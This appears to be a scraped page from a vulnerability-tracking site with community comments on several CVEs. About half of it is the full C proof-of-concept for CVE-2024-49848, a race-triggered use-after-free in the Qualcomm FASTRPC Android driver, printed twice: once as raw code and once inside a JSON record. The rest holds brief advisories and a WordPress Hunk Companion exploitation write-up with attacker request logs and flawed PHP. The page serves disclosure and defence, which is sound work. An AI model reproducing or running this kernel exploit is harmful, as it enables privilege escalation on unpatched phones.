    long ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_INVOKE2,&inv);
    printf("submit job ret: %lx %m\n",ret);
    return ret;
}
void* thread_inv(void* arg) {
    while(1) {
    //Need to replace value with & new map on other thread
        unsigned value = 255;
        unsigned out_values[256] = {0};
        long ret;
        //Not using submit_job() to increase race precision
        struct fastrpc_ioctl_invoke_async ioctl_arg;
        remote_arg_t ra[2];
        ra[0].buf.pv = (void *)0;
        ra[0].buf.len = sizeof(value);
        ra[1].buf.pv = (void *)(&out_values[1]);
        ra[1].buf.len = value * sizeof(uint32_t);
        ioctl_arg.inv.handle = FASTRPC_STATIC_HANDLE_CURRENT_PROCESS;
        ioctl_arg.inv.sc = REMOTE_SCALARS_MAKE(0, 1, 1);
        ioctl_arg.inv.pra = ra;
        ioctl_arg.fds = calloc(REMOTE_SCALARS_LENGTH(ioctl_arg.inv.sc),sizeof(int));
        ioctl_arg.fds[0] = heap_data.fd;
        ioctl_arg.fds[1] = -1;
        ioctl_arg.attrs = NULL;
        ioctl_arg.crc = NULL;
        ioctl_arg.perf_kernel = NULL;
        ioctl_arg.perf_dsp = NULL;
        ioctl_arg.job = malloc(sizeof(*ioctl_arg.job));
        ioctl_arg.job->isasyncjob = 1;
        ioctl_arg.job->jobid = jobid++;
        struct fastrpc_ioctl_invoke2 inv;
        inv.invparam = &ioctl_arg;
        inv.req = FASTRPC_INVOKE2_ASYNC;
        inv.size = sizeof(struct fastrpc_ioctl_invoke_async);
        close(heap_data.fd);
        pthread_barrier_wait(barrier);
        ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_INVOKE2,&inv);
        printf("job submit: %ld %m\n",ret);
        fflush(stdout);
        if(!ret) {
            *((unsigned*) &barrier[1]) = 1;
            pthread_barrier_wait(barrier);
            exit(0);
        }
        pthread_barrier_wait(barrier);

    }


    return NULL;
}

int main() {
    adsprpc_fd = create_and_init_adsprpc();
    if(adsprpc_fd == -1) {
        printf("failed to open adsprpc...\n");
        return 1;
    }
    barrier = mmap(NULL,0x1000,PROT_READ | PROT_WRITE,MAP_SHARED | MAP_ANONYMOUS,0,0);
    pthread_barrierattr_t attr;
    pthread_barrierattr_init(&attr);
    pthread_barrierattr_setpshared(&attr,PTHREAD_PROCESS_SHARED);
    pthread_barrier_init(barrier,&attr,2);
    //pthread_create(&tid_int,NULL,&thread_interrupt,NULL);

    int ret = ioctl(dma_heap,DMA_HEAP_IOCTL_ALLOC,&heap_data);
    if( ret < 0 || heap_data.fd < 0)
    {
        printf("dma heap allocation fail: %d %d %m\n",ret,heap_data.fd);
        return -1;
    }

    // for(unsigned i = 0; i < 1022; i++) {
    //     if(submit_job() < 0) {
    //         printf("failed to submit a job at i = %u\n",i);
    //         exit(0);
    //     }
    // }
    printf("mapping...\n");
    fflush(stdout);
    value_loc = mmap(NULL,0x2000,PROT_READ | PROT_WRITE,MAP_PRIVATE,heap_data.fd,0);
    pid_t pid;
    if(!(pid = fork())) {
        thread_inv(NULL);
        exit(0);
    }
    // pthread_create(&tid_inv,NULL,&thread_inv,NULL);

    unsigned long spoof_map = 0x2000;
    uint64_t vaddrouts[1024];
    unsigned top = 0;
    do {
        struct fastrpc_ioctl_mem_map mmap_struct = {
                .m = {
                    .flags = 0,
                    .fd = heap_data.fd,
                    .length = 0x2000,
                    .attrs = 0,
                    .vaddrin = spoof_map,
                    .vaddrout = 0,
                    .offset = 0,
                }
        };
        spoof_map += 0x2000;
        unsigned long ioret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_MAP,&mmap_struct);
        printf("mem_map loop: %lx 0x%lx\n",ioret,mmap_struct.m.vaddrout);
        vaddrouts[top] = mmap_struct.m.vaddrout;
    } while (vaddrouts[top++]);
    // struct fastrpc_ioctl_mem_map mmap_struct = {
    //         .m = {
    //             .flags = 0,
    //             .fd = heap_data.fd,
    //             .length = 0x1000,
    //             .attrs = 0,
    //             .vaddrin = value_loc,
    //             .offset = 0,
    //         }
    // };
    //     //pthread_barrier_wait(&barrier);
    // unsigned long ioret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_MAP,&mmap_struct);
    // printf("mem_map1: %lx 0x%lx\n",ioret,mmap_struct.m.vaddrout);
    // struct fastrpc_ioctl_mem_unmap unmap_struct = {
    //     .um = {
    //         .fd = heap_data.fd,
    //         .length = 0x1000,
    //         .vaddr = mmap_struct.m.vaddrout
    //     }
    // };
    // ioret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_UNMAP,&unmap_struct);
    // printf("mem_unmap1: %lx\n",ioret);
    unsigned first = true;
    while(1) {
        struct fastrpc_ioctl_mem_map mmap_struct = {
            .m = {
                .flags = FASTRPC_MAP_FD_NOMAP,
                .fd = heap_data.fd,
                .length = 0x1000,
                .attrs = FASTRPC_ATTR_KEEP_MAP,
                .vaddrin = value_loc,
                .offset = -1,
            }
        };
        pthread_barrier_wait(barrier);
        unsigned long ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_MAP,&mmap_struct);
        printf("mem_map2: %lx\n",ret);
        fflush(stdout);
        struct fastrpc_ioctl_munmap_fd final_munmap = {
            .fd = heap_data.fd,
            .flags = 0,
            .len = 0x1000,
            .va = 0
        };
        unsigned long final_ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MUNMAP_FD,&final_munmap);
        printf("munmap fd: %lx %m\n",final_ret);
        pthread_barrier_wait(barrier);
        if(*(unsigned*)&barrier[1]) {
            break;
        }
        if(first && fgetc(stdin) == 'n') {
            kill(pid,SIGKILL);
            exit(0);
        }
        first = false;
    }
    // pthread_join(tid_int,NULL);
    // pthread_join(tid_inv,NULL);


    // for(unsigned i = 0; i < top; i++)
    // {
    //     struct fastrpc_ioctl_mem_unmap unmap_struct = {
    //         .um = {
    //             .fd = heap_data.fd,
    //             .length = 0x2000,
    //             .vaddr = vaddrouts[i],
    //         }
    //     };
    //     unsigned long ioret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_UNMAP,&unmap_struct);
    //     if(ioret)
    //         printf("unexpected unmap fail %lx %m\n",ioret);
    // }
    // while(1) sleep(1);
    return 0;
    // struct fastrpc_ioctl_mmap mmap_struct2 = {
    //     .fd = -1,
    //     .flags = ADSP_MMAP_HEAP_ADDR,
    //     .vaddrin = 0,
    //     .size = 0x1000
    // };
    // ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MMAP,&mmap_struct2);
    // if(ret < 0)
    // {
    //     printf("ret mmap: %lx %m\n",ret);
    // }
    // printf("vaddrout: %lx %m\n",mmap_struct2.vaddrout);

}


{
   uuid: "23fd524b-475e-4b9f-8dc2-7b67f4cec409",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "FASTRPC_ATTR_KEEP_MAP logic bug allows fastrpc_internal_munmap_fd to concurrently free in-use mappings leading to UAF",
   description: "Ref: [https://project-zero.issues.chromium.org/issues/42451725](https://project-zero.issues.chromium.org/issues/42451725)\n\n~~~\n#include \"adsprpc_shared.h\"\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/wait.h>\n#include <linux/dma-heap.h>\n#include <sys/mman.h>\n#include <errno.h>\n#include <pthread.h>\n#include <signal.h>\n\n#define FASTRPC_MODE_UNSIGNED_MODULE 8\n#define FASTRPC_STATIC_HANDLE_PROCESS_GROUP (1)\n#define FASTRPC_STATIC_HANDLE_DSP_UTILITIES (2)\n#define FASTRPC_STATIC_HANDLE_LISTENER (3)\n#define FASTRPC_STATIC_HANDLE_CURRENT_PROCESS (4)\nint dma_heap;\nint adsprpc_fd;\nint create_and_init_adsprpc()\n{\n    int adsprpc_fd = open(\"/dev/adsprpc-smd\",O_RDONLY);\n    if(adsprpc_fd == -1) {\n        printf(\"open: %m\\n\");\n        return -1;\n    }\n    unsigned cid = 3;\n    long ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_GETINFO,&cid);\n    int shell_fd = open(\"/data/local/tmp/fastrpc_shell_unsigned_3\",O_RDONLY);\n    if(shell_fd == -1) {\n        printf(\"open shell: %m\\n\");\n        return -1;\n    }\n    dma_heap = open(\"/dev/dma_heap/system\",O_RDONLY);\n    if(dma_heap == -1) {\n        printf(\"open dma_heap: %m\\n\");\n        return -1;\n    }\n    struct dma_heap_allocation_data heap_data = {\n        .len = 0x131000,\n        .fd_flags = O_RDWR,\n    };\n    ret = ioctl(dma_heap,DMA_HEAP_IOCTL_ALLOC,&heap_data);\n    if( ret < 0 || heap_data.fd < 0)\n    {\n        printf(\"dma heap allocation fail: %d %d %m\\n\",ret,heap_data.fd);\n        return -1;\n    }\n    void* shell_file_dma = mmap(NULL,0x131000,PROT_READ | PROT_WRITE, MAP_SHARED,heap_data.fd,0);\n    long length = read(shell_fd,shell_file_dma,0x131000);\n    if(length <= 0) {\n        printf(\"read: %d %m\\n\",ret);\n        return -1;\n    }\n    close(shell_fd);\n    struct fastrpc_ioctl_init_attrs init = {\n        .init = {\n            .file = shell_file_dma,\n            .filefd = heap_data.fd,\n        
    .filelen = length,\n            .mem = 0,\n            .flags = FASTRPC_INIT_CREATE,\n        },\n        .attrs = FASTRPC_MODE_UNSIGNED_MODULE\n    };\n    ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_INIT_ATTRS,&init);\n    if(ret < 0)\n    {\n        printf(\"init_attrs: %d %m\\n\",ret);\n        return -1;\n    }\n    return adsprpc_fd;\n}\npthread_barrier_t* barrier;\npthread_t tid_inv,tid_int;\nunsigned long* value_loc;\nstruct dma_heap_allocation_data heap_data = {\n    .len = 0x10000,\n    .fd_flags = O_RDWR,\n};\nvoid handler(int signo, siginfo_t *info, void* context) {\n    return;\n}\nsig_atomic_t jobid = 0;\nlong submit_job() {\n    unsigned value = 255;\n    unsigned out_values[256] = {0};\n    struct fastrpc_ioctl_invoke_async ioctl_arg;\n    remote_arg_t ra[2];\n    ra[0].buf.pv = (void *)&value;\n    ra[0].buf.len = sizeof(value);\n    ra[1].buf.pv = (void *)(&out_values[1]);\n    ra[1].buf.len = value * sizeof(uint32_t);\n    ioctl_arg.inv.handle = FASTRPC_STATIC_HANDLE_CURRENT_PROCESS;\n    ioctl_arg.inv.sc = REMOTE_SCALARS_MAKE(0, 1, 1);\n    ioctl_arg.inv.pra = ra;\n    ioctl_arg.fds = NULL;\n    ioctl_arg.attrs = NULL;\n    ioctl_arg.crc = NULL;\n    ioctl_arg.perf_kernel = NULL;\n    ioctl_arg.perf_dsp = NULL;\n    ioctl_arg.job = NULL;\n    ioctl_arg.job = malloc(sizeof(*ioctl_arg.job));\n    ioctl_arg.job->isasyncjob = 1;\n    ioctl_arg.job->jobid = jobid++;\n    struct fastrpc_ioctl_invoke2 inv;\n    inv.invparam = &ioctl_arg;\n    inv.req = FASTRPC_INVOKE2_ASYNC;\n    inv.size = sizeof(struct fastrpc_ioctl_invoke_async);\n\n    long ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_INVOKE2,&inv);\n    printf(\"submit job ret: %lx %m\\n\",ret);\n    return ret;\n}\nvoid* thread_inv(void* arg) {\n    while(1) {\n    //Need to replace value with & new map on other thread\n        unsigned value = 255;\n        unsigned out_values[256] = {0};\n        long ret;\n        //Not using submit_job() to increase race precision\n        struct 
fastrpc_ioctl_invoke_async ioctl_arg;\n        remote_arg_t ra[2];\n        ra[0].buf.pv = (void *)0;\n        ra[0].buf.len = sizeof(value);\n        ra[1].buf.pv = (void *)(&out_values[1]);\n        ra[1].buf.len = value * sizeof(uint32_t);\n        ioctl_arg.inv.handle = FASTRPC_STATIC_HANDLE_CURRENT_PROCESS;\n        ioctl_arg.inv.sc = REMOTE_SCALARS_MAKE(0, 1, 1);\n        ioctl_arg.inv.pra = ra;\n        ioctl_arg.fds = calloc(REMOTE_SCALARS_LENGTH(ioctl_arg.inv.sc),sizeof(int));\n        ioctl_arg.fds[0] = heap_data.fd;\n        ioctl_arg.fds[1] = -1;\n        ioctl_arg.attrs = NULL;\n        ioctl_arg.crc = NULL;\n        ioctl_arg.perf_kernel = NULL;\n        ioctl_arg.perf_dsp = NULL;\n        ioctl_arg.job = malloc(sizeof(*ioctl_arg.job));\n        ioctl_arg.job->isasyncjob = 1;\n        ioctl_arg.job->jobid = jobid++;\n        struct fastrpc_ioctl_invoke2 inv;\n        inv.invparam = &ioctl_arg;\n        inv.req = FASTRPC_INVOKE2_ASYNC;\n        inv.size = sizeof(struct fastrpc_ioctl_invoke_async);\n        close(heap_data.fd);\n        pthread_barrier_wait(barrier);\n        ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_INVOKE2,&inv);\n        printf(\"job submit: %ld %m\\n\",ret);\n        fflush(stdout);\n        if(!ret) {\n            *((unsigned*) &barrier[1]) = 1;\n            pthread_barrier_wait(barrier);\n            exit(0);\n        }\n        pthread_barrier_wait(barrier);\n\n    }\n\n    \n    return NULL;\n}\n\nint main() {\n    adsprpc_fd = create_and_init_adsprpc();\n    if(adsprpc_fd == -1) {\n        printf(\"failed to open adsprpc...\\n\");\n        return 1;\n    }\n    barrier = mmap(NULL,0x1000,PROT_READ | PROT_WRITE,MAP_SHARED | MAP_ANONYMOUS,0,0);\n    pthread_barrierattr_t attr;\n    pthread_barrierattr_init(&attr);\n    pthread_barrierattr_setpshared(&attr,PTHREAD_PROCESS_SHARED);\n    pthread_barrier_init(barrier,&attr,2);\n    //pthread_create(&tid_int,NULL,&thread_interrupt,NULL);\n\n    int ret = 
ioctl(dma_heap,DMA_HEAP_IOCTL_ALLOC,&heap_data);\n    if( ret < 0 || heap_data.fd < 0)\n    {\n        printf(\"dma heap allocation fail: %d %d %m\\n\",ret,heap_data.fd);\n        return -1;\n    }\n\n    // for(unsigned i = 0; i < 1022; i++) {\n    //     if(submit_job() < 0) {\n    //         printf(\"failed to submit a job at i = %u\\n\",i);\n    //         exit(0);\n    //     }\n    // }\n    printf(\"mapping...\\n\");\n    fflush(stdout);\n    value_loc = mmap(NULL,0x2000,PROT_READ | PROT_WRITE,MAP_PRIVATE,heap_data.fd,0);\n    pid_t pid;\n    if(!(pid = fork())) {\n        thread_inv(NULL);\n        exit(0);\n    }\n    // pthread_create(&tid_inv,NULL,&thread_inv,NULL);\n\n    unsigned long spoof_map = 0x2000;\n    uint64_t vaddrouts[1024];\n    unsigned top = 0;\n    do {\n        struct fastrpc_ioctl_mem_map mmap_struct = {\n                .m = {\n                    .flags = 0,\n                    .fd = heap_data.fd,\n                    .length = 0x2000,\n                    .attrs = 0,\n                    .vaddrin = spoof_map,\n                    .vaddrout = 0,\n                    .offset = 0,\n                }\n        };\n        spoof_map += 0x2000;\n        unsigned long ioret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_MAP,&mmap_struct);\n        printf(\"mem_map loop: %lx 0x%lx\\n\",ioret,mmap_struct.m.vaddrout);\n        vaddrouts[top] = mmap_struct.m.vaddrout;\n    } while (vaddrouts[top++]);\n    // struct fastrpc_ioctl_mem_map mmap_struct = {\n    //         .m = {\n    //             .flags = 0,\n    //             .fd = heap_data.fd,\n    //             .length = 0x1000,\n    //             .attrs = 0,\n    //             .vaddrin = value_loc,\n    //             .offset = 0,\n    //         }\n    // };\n    //     //pthread_barrier_wait(&barrier);\n    // unsigned long ioret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_MAP,&mmap_struct);\n    // printf(\"mem_map1: %lx 0x%lx\\n\",ioret,mmap_struct.m.vaddrout);\n    // struct fastrpc_ioctl_mem_unmap 
unmap_struct = {\n    //     .um = {\n    //         .fd = heap_data.fd,\n    //         .length = 0x1000,\n    //         .vaddr = mmap_struct.m.vaddrout\n    //     }\n    // };\n    // ioret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_UNMAP,&unmap_struct);\n    // printf(\"mem_unmap1: %lx\\n\",ioret);\n    unsigned first = true;\n    while(1) {\n        struct fastrpc_ioctl_mem_map mmap_struct = {\n            .m = {\n                .flags = FASTRPC_MAP_FD_NOMAP,\n                .fd = heap_data.fd,\n                .length = 0x1000,\n                .attrs = FASTRPC_ATTR_KEEP_MAP,\n                .vaddrin = value_loc,\n                .offset = -1,\n            }\n        };\n        pthread_barrier_wait(barrier);\n        unsigned long ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_MAP,&mmap_struct);\n        printf(\"mem_map2: %lx\\n\",ret);\n        fflush(stdout);\n        struct fastrpc_ioctl_munmap_fd final_munmap = {\n            .fd = heap_data.fd,\n            .flags = 0,\n            .len = 0x1000,\n            .va = 0\n        };\n        unsigned long final_ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MUNMAP_FD,&final_munmap);\n        printf(\"munmap fd: %lx %m\\n\",final_ret);\n        pthread_barrier_wait(barrier);\n        if(*(unsigned*)&barrier[1]) {\n            break;\n        }\n        if(first && fgetc(stdin) == 'n') {\n            kill(pid,SIGKILL);\n            exit(0);\n        }\n        first = false;\n    }\n    // pthread_join(tid_int,NULL);\n    // pthread_join(tid_inv,NULL);\n    \n\n    // for(unsigned i = 0; i < top; i++)\n    // {\n    //     struct fastrpc_ioctl_mem_unmap unmap_struct = {\n    //         .um = {\n    //             .fd = heap_data.fd,\n    //             .length = 0x2000,\n    //             .vaddr = vaddrouts[i],\n    //         }\n    //     };\n    //     unsigned long ioret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_UNMAP,&unmap_struct);\n    //     if(ioret)\n    //         printf(\"unexpected unmap fail %lx %m\\n\",ioret);\n    
// }\n    // while(1) sleep(1);\n    return 0;\n    // struct fastrpc_ioctl_mmap mmap_struct2 = {\n    //     .fd = -1,\n    //     .flags = ADSP_MMAP_HEAP_ADDR,\n    //     .vaddrin = 0,\n    //     .size = 0x1000\n    // };\n    // ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MMAP,&mmap_struct2);\n    // if(ret < 0)\n    // {\n    //     printf(\"ret mmap: %lx %m\\n\",ret);\n    // }\n    // printf(\"vaddrout: %lx %m\\n\",mmap_struct2.vaddrout);\n\n}\n~~~",
   description_format: "markdown",
   vulnerability: "CVE-2024-49848",
   creation_timestamp: "2024-12-18T13:24:38.041835+00:00",
   timestamp: "2024-12-18T13:25:07.723264+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
            "vulnerability:information=annotation",
         ],
      },
   ],
}

cve-2024-49848

Some questions about CVE-2017-7407 and Bagder's work quality (@bagder@mastodon.social) 🙃 on cve-2017-7407
3 months ago by Cédric Bonhomme

It seems that Bagder loves when someone dives deep into history and believes they have found a mistake in his work.


{
   uuid: "942a20f3-cbb3-4457-b3b0-4ddf34d2d6e7",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Some questions about CVE-2017-7407 and Bagder's work quality (@bagder@mastodon.social) 🙃",
   description: "It seems that Bagder loves when someone dives deep into history and believes they have found a mistake in his work.",
   description_format: "markdown",
   vulnerability: "CVE-2017-7407",
   creation_timestamp: "2024-12-18T09:17:43.314628+00:00",
   timestamp: "2024-12-18T09:32:02.829318+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         ref: [
            "https://mastodon.social/users/bagder/statuses/113672931060541852",
            "https://curl.se/mail/lib-2024-12/0024.html",
         ],
      },
   ],
}

cve-2017-7407

Serbia: Authorities using spyware and Cellebrite forensic extraction tools to hack journalists and activists on cve-2024-49848
3 months ago by Cédric Bonhomme

"Serbian police and intelligence authorities are using advanced phone spyware alongside mobile phone forensic products to unlawfully target journalists, environmental activists and other individuals in a covert surveillance campaign, a new Amnesty International report has revealed."

More information here: https://securitylab.amnesty.org/latest/2024/12/serbia-a-digital-prison-spyware-and-cellebrite-used-on-journalists-and-activists/


{
   uuid: "63467d03-38f4-4840-bb15-7a6df0e7160d",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Serbia: Authorities using spyware and Cellebrite forensic extraction tools to hack journalists and activists",
   description: "\n> \"Serbian police and intelligence authorities are using advanced phone spyware alongside mobile phone forensic products to unlawfully target journalists, environmental activists and other individuals in a covert surveillance campaign, a new Amnesty International report has revealed. \"\n\nMore information here: https://securitylab.amnesty.org/latest/2024/12/serbia-a-digital-prison-spyware-and-cellebrite-used-on-journalists-and-activists/",
   description_format: "markdown",
   vulnerability: "CVE-2024-49848",
   creation_timestamp: "2024-12-17T20:35:21.382555+00:00",
   timestamp: "2024-12-17T20:35:21.382555+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         ref: [
            "https://securitylab.amnesty.org/latest/2024/12/serbia-a-digital-prison-spyware-and-cellebrite-used-on-journalists-and-activists/",
         ],
      },
   ],
}

cve-2024-49848

PoC and details for CyberPanel on cve-2024-53376
3 months ago by Alexandre Dulaunoy

CyberPanel authenticated RCE < 2.3.8 (https://github.com/ThottySploity/CVE-2024-53376)


{
   uuid: "5d1aa981-8c34-43d5-bc8f-afcd585d782a",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "PoC and details for CyberPanel",
   description: "- [ CyberPanel authenticated RCE < 2.3.8 ](https://github.com/ThottySploity/CVE-2024-53376)",
   description_format: "markdown",
   vulnerability: "cve-2024-53376",
   creation_timestamp: "2024-12-17T05:27:57.023081+00:00",
   timestamp: "2024-12-17T05:27:57.023081+00:00",
   related_vulnerabilities: [
      "CVE-2024-53376",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

cve-2024-53376

Bugzilla record for this vulnerability on cve-2024-53677
4 months ago by Alexandre Dulaunoy

Bug 2331686 (CVE-2024-53677) - CVE-2024-53677 struts: org.apache.struts: mixing setters for uploaded files and normal fields can allow bypass file upload checks (https://bugzilla.redhat.com/show_bug.cgi?id=2331686)

An interesting note: Note: application not using FileUploadInterceptor are safe.


{
   uuid: "ec831761-cc7a-463a-bf13-08ab7d376af1",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Bugzilla record for this vulnerability",
   description: "- [Bug 2331686 (CVE-2024-53677) - CVE-2024-53677 struts: org.apache.struts: mixing setters for uploaded files and normal fields can allow bypass file upload checks ](https://bugzilla.redhat.com/show_bug.cgi?id=2331686)\n\nAn interesting note: **Note: application not using FileUploadInterceptor are safe.** ",
   description_format: "markdown",
   vulnerability: "CVE-2024-53677",
   creation_timestamp: "2024-12-16T14:25:04.252985+00:00",
   timestamp: "2024-12-16T14:25:04.252985+00:00",
   related_vulnerabilities: [
      "CVE-2024-53677",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

cve-2024-53677

CVE-2024-11053 is *not* a critical security flaw on cve-2024-11053
4 months ago by Alexandre Dulaunoy

Clarification by the author/maintainer of the project:

https://mastodon.social/@bagder/113657205050547339

FYI: CVE-2024-11053 is *not* a critical security flaw, even if now several security related sites repeat that statement.

This is as good as any reminder that you should read the #curl advisories for #curl issues rather than trusting the scaremongers.

https://curl.se/docs/CVE-2024-11053.html


{
   uuid: "d5063906-100a-4bf2-9ef4-94173879f4e1",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "CVE-2024-11053 is *not* a critical security flaw",
   description: "Clarification by the author/maintainer of the project:\n\n[https://mastodon.social/@bagder/113657205050547339](https://mastodon.social/@bagder/113657205050547339)\n\n~~~\nFYI: CVE-2024-11053 is *not* a critical security flaw, even if now several security related sites repeat that statement.\n\nThis is as good as any reminder that you should read the #curl advisories for #curl issues rather than trusting the scaremongers.\n~~~\n\n[https://curl.se/docs/CVE-2024-11053.html](https://curl.se/docs/CVE-2024-11053.html)",
   description_format: "markdown",
   vulnerability: "CVE-2024-11053",
   creation_timestamp: "2024-12-15T15:17:20.218435+00:00",
   timestamp: "2024-12-15T15:17:59.506935+00:00",
   related_vulnerabilities: [
      "CVE-2024-11053",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

cve-2024-11053

Unauthorized Plugin Installation/Activation in Hunk Companion | WPScan on cve-2024-11972
4 months ago by Alexandre Dulaunoy

Unauthorized Plugin Installation/Activation in Hunk Companion | WPScan

Ref: https://wpscan.com/blog/unauthorized-plugin-installation-activation-in-hunk-companion/

This report highlights a vulnerability in the Hunk Companion plugin < 1.9.0 that allows unauthenticated POST requests to install and activate plugins directly from the WordPress.org repository.

This flaw poses a significant security risk, as it enables attackers to install vulnerable or closed plugins, which can then be exploited for attacks such as Remote Code Execution (RCE), SQL Injection, Cross‑Site Scripting (XSS), or even the creation of administrative backdoors. By leveraging these outdated or unmaintained plugins, attackers can bypass security measures, manipulate database records, execute malicious scripts, and gain unauthorized administrative access to the site.

Method of Exploitation

While tracing an infection on a WordPress site, we uncovered a live vulnerability currently being exploited in a two‑step process:

  1. Unauthenticated Installation/Activation: Attackers exploit a flaw to install and activate the now‑closed and vulnerable plugin, WP Query Console
  2. Remote Code Execution (RCE): The vulnerability in WP Query Console is then exploited to evaluate arbitrary and malicious PHP code.

In the infections we’ve analyzed, attackers use the RCE to write a PHP dropper to the site’s root directory. This dropper allows continued unauthenticated uploads via GET requests, enabling persistent backdoor access to the site.

Investigation

The vulnerability was uncovered during an investigation into the entry point for an infection caused by its exploitation. Access logs revealed that the change timestamp of a randomly named PHP file located in the root of the WordPress installation (/htdocs/aea74fff3c02.php) was preceded by requests to the following endpoints:

  • Time: Nov 27, 2024 @ 08:21:41.812 | request_url: /aea74fff3c02.php | httpuseragent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2735.76 Safari/537.36 | request_type: GET
  • Time: Nov 27, 2024 @ 08:21:41.561 | request_url: /?rest_route=/wqc/v1/query | httpuseragent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2735.76 Safari/537.36 | request_type: POST
  • Time: Nov 27, 2024 @ 08:21:40.354 | request_url: /wp-json/hc/v1/themehunk-import | httpuseragent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2735.76 Safari/537.36 | request_type: POST
  • Time: Nov 27, 2024 @ 08:21:08.151 | request_url: /wp-json/hc/v1/themehunk-import | httpuseragent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2735.76 Safari/537.36 | request_type: POST

Further investigation revealed that the plugins responsible for these endpoints are Hunk Companion and WP Query Console, respectively. Each observed infection’s modification times aligned with POST requests to these same endpoints.

The Remote Code Execution (RCE) vulnerability in WP Query Console, reported under CVE‑2024‑50498, remains unpatched. Meanwhile, the unauthenticated plugin installation/activation vulnerability in Hunk Companion was reportedly fixed in version 1.8.5 and greater, as documented in CVE‑2024‑9707.

Upon further review, we confirmed that this infection did, in fact, occur with the latest version of Hunk Companion at that time, 1.8.7, indicating that the vulnerability had persisted in the current version.

Code Analysis

An analysis of the code responsible for the themehunk‑import endpoint revealed the vulnerability being exploited.

Within the file hunk‑companion/import/core/class‑installation.php, the class HUNK_COMPANION_SITES_BUILDER_SETUP is executed by the endpoint and handles plugin installation and activation.

On line 204, the following code demonstrates that the WordPress.org URL is hardcoded, restricting installations to plugins hosted on the WordPress.org repository:

$temp_file = download_url('https://downloads.wordpress.org/plugin/'.$slug.'.zip');

However, this URL allows the download of plugins, even if they have been closed or removed from the repository. This behavior introduces a significant vector for exploitation, enabling attackers to install vulnerable plugins.

The vulnerability stems from the weakness found in hunk‑companion/import/app/app.php:

        register_rest_route( 'hc/v1', 'themehunk-import', array(
            'methods' => 'POST',
            'callback' => array( $this, 'tp_install' ),
            'permission_callback' => function () {
                // Check if the user is logged in
                if ( ! is_user_logged_in() ) {
                    //return new WP_REST_Response( 'Unauthorized: User not logged in', 401 );
                }

                // Debug: Log the user role and capabilities to see what they have
                $current_user = wp_get_current_user();
                // error_log( 'Current user: ' . $current_user->user_login );
                // error_log( 'User roles: ' . implode( ', ', $current_user->roles ) );
                // error_log( 'User capabilities: ' . print_r( $current_user->allcaps, true ) );

                // Ensure the user has the 'install_plugins' capability
                if ( ! current_user_can( 'install_plugins' ) ) {
                    return new WP_REST_Response( 'Unauthorized: Insufficient capabilities', 401 );
                }

                // Get the nonce from the request header
                $nonce = $request->get_header('X-WP-Nonce');

                // Verify the nonce
                if ( ! wp_verify_nonce( $nonce, 'hc_import_nonce' ) ) {
                    return new WP_REST_Response( 'Unauthorized: Invalid nonce', 401 );
                }

                return true; // Permission granted
            },
        ) );

Lines 28‑59 register the REST API route for themehunk‑import. In version 1.8.5, the plugin author introduced a permission_callback to restrict access. However, for permission_callback to work correctly, it must return a boolean (false to reject requests, true to accept) or a WP_Error object.

In this case, failed conditions return new WP_REST_Response, which is not a boolean or WP_Error. As a result, the permission_callback always evaluates to true, allowing unauthenticated requests to bypass the intended checks. This flaw enables the execution of the tp_install function, which invokes the HUNK_COMPANION_SITES_BUILDER_SETUP class, leading to the installation and activation of arbitrary plugins.

Recommended Fix

To address this issue, the themehunk‑import and ai‑site‑import endpoints needed to be patched. Specifically, the return statements for failed conditions needed to be changed. For example, replace:

return new WP_REST_Response( 'Unauthorized: User not logged in', 401 );

With:

return new WP_Error( 'unauthorized', __( 'You must be logged in.' ), array( 'status' => 401 ) );

This change ensures the permission_callback correctly denies unauthorized requests, mitigating the vulnerability.

As of 1.9.0, the author implemented the necessary patch, and we have confirmed that the exploit is no longer present.

Conclusion

